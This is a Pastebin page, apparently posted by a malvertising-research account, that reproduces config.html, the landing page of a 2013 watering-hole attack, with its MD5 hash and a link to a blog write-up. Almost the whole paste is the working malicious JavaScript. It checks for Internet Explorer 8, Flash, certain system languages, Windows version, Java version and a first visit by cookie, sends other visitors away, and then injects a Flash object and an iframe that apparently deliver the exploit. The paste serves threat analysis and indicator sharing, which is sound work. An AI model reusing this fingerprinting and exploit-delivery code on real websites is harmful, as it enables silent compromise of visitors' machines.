API tools faq
paste
Advertisement
StopMalvertising

config.html

StopMalvertising
Jan 2nd, 2013
205
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.56 KB | None | 0 0
raw download clone embed print report
  1. http://eromang.zataz.com/2013/01/02/capstone-turbine-corporation-also-targeted-in-the-cfr-watering-hole-attack-and-more/
  2.  
  3. config.html
  4. MD5: a25c13d4edb207e6ce153469c1104223
  5. -----------------------------------------------------------------------------------------------------
  6. <html>
  7. <head>
  8. <script src=deployJava.js></script>
  9. <script type="text/javascript">
  10. function getCookieVal (offset)
  11. {
  12. var endstr = document.cookie.indexOf (";", offset);
  13. if (endstr == -1)
  14. {
  15. endstr = document.cookie.length;
  16. }
  17. return unescape(document.cookie.substring(offset, endstr));
  18. }
  19. function GetCookie (name)
  20. {
  21. var arg = name + "=";
  22. var alen = arg.length;
  23. var clen = document.cookie.length;
  24. var i = 0;
  25. while (i < clen)
  26. {
  27. var j = i + alen;
  28. if (document.cookie.substring(i, j) == arg)
  29. return getCookieVal (j);
  30. i = document.cookie.indexOf(" ", i) + 1;
  31. if (i == 0)
  32. break;
  33. }
  34. return null;
  35. }
  36. function SetCookie (name, value)
  37. {
  38. var argv = SetCookie.arguments;
  39. var argc = SetCookie.arguments.length;
  40. var expires = (2 < argc) ? argv[2] : null;
  41. var path = (3 < argc) ? argv[3] : null;
  42. var domain = (4 < argc) ? argv[4] : null;
  43. var secure = (5 < argc) ? argv[5] : false;
  44. document.cookie = name + "=" + escape (value) +
  45. ((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
  46. ((path == null) ? "" : ("; path=" + path)) +
  47. ((domain == null) ? "" : ("; domain=" + domain)) +
  48. ((secure == true) ? "; secure" : "");
  49. }
  50. function DisplayInfo()
  51. {
  52. var expdate = new Date();
  53. var visit;
  54. expdate.setTime(expdate.getTime() + (24 * 60 * 60 * 1000*7 ));
  55. if(!(visit = GetCookie("visit")))
  56. visit = 0;
  57. visit++;
  58. SetCookie("visit", visit, expdate, "/", null, false);
  59. return visit;
  60. }
  61. var ua = window.navigator.userAgent.toLowerCase();
  62.  
  63. if (ua.indexOf('msie 8.0') <0)
  64. {
  65. location.href="about:blank";
  66. }
  67.  
  68. var f = 0;
  69. try {
  70. f = new ActiveXObject('ShockwaveFlash.ShockwaveFlash');
  71. }
  72. catch (e) {
  73. }
  74. var g=typeof f;
  75.  
  76. if(g!="object")
  77. {
  78. location.href="about:blank";
  79. }
  80. var h=navigator.systemLanguage.toLowerCase();
  81.  
  82. if(h!="zh-cn" && h!="en-us" && h!= "zh-tw"&& h!= "ja" && h!= "ru"&&h!= "ko" )
  83. {
  84.  
  85. location.href="about:blank";
  86. }
  87.  
  88. var num=DisplayInfo();
  89. if(num >1)
  90. {
  91. location.href="about:blank";
  92. }
  93. function download()
  94. {
  95. var xmlhttp;
  96. try
  97. {
  98. xmlhttp = new XMLHttpRequest();
  99. }
  100. catch (e)
  101. {
  102. var XMLHTTP_IDS = new Array('MSXML2.XMLHTTP.5.0','MSXML2.XMLHTTP.4.0','MSXML2.XMLHTTP.3.0','MSXML2.XMLHTTP','Microsoft.XMLHTTP' );
  103. var success = false;
  104. for (var i=0;i < XMLHTTP_IDS.length && !success; i++)
  105. {
  106. try
  107. {
  108. xmlhttp = new ActiveXObject(XMLHTTP_IDS[i]);
  109. success = true;
  110. } catch (e)
  111. {}
  112. }
  113. }
  114. function callback()
  115. {
  116. if(xmlhttp.readyState==4)
  117. {
  118. if(xmlhttp.status==200)
  119. {
  120. var temp=ua.replace(/ /g,"");
  121. if (temp.indexOf("nt6.1")>-1) {
  122.  
  123.  
  124. if ((deployJava.versionCheck('1.6.0+') == true) && (deployJava.versionCheck('1.7.0+') == false)) {
  125.  
  126.  
  127. document.getElementById('test').innerHTML="default";
  128. document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  129.  
  130. }
  131. else
  132. {
  133. location.href="about:blank";
  134. }
  135. }
  136. else if(temp.indexOf("nt5.1")>-1)
  137. {
  138.  
  139. document.getElementById('test').innerHTML="cat";
  140. document.body.innerHTML += "<object classid=\"clsid:D27CDB6E-AE6D-11cf-96B8-444553540000\" width=\"100%\" height=\"100%\" id=\"today\"><param name=\"movie\" value=\"today.swf\" /><param name=\"quality\" value=\"high\" /><param name=\"bgcolor\" value=\"#ffffff\" /><param name=\"allowScriptAccess\" value=\"sameDomain\" /><param name=\"allowFullScreen\" value=\"true\" /></object><iframe src=news.html></iframe>";
  141.  
  142. }
  143. else
  144. {
  145. location.href="about:blank";
  146. }
  147.  
  148. }
  149. }
  150. }
  151. xmlhttp.open("get", "xsainfo.jpg", true);
  152. xmlhttp.onreadystatechange = callback;
  153. xmlhttp.send(null);
  154. }
  155.  
  156. </script>
  157. </head>
  158. <body onload="download()">
  159. <div style=display:none>
  160. <div id=test>hello</div>
  161. </div>
  162. </body>
  163. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!